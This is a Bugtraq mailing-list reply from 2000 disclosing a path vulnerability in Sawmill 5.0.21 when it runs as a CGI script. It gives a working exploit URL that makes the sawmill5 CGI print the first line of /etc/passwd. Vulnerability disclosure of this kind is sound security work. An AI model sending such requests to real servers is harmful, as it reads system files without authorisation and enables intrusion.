Bugtraq mailing list archives

Re: sawmill5.0.21 path bug

From: lwc () VAPID DHS ORG (Cashdollar, Larry)
Date: Tue, 27 Jun 2000 15:36:45 -0700


Sawmill can also be run as a cgi script.  This method is vulnerable as
well.

The following will print the first line of the password file

http://www.example.com/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1

-- Larry Cashdollar

Current thread:

Re: sawmill5.0.21 path bug Cashdollar, Larry (Jun 27)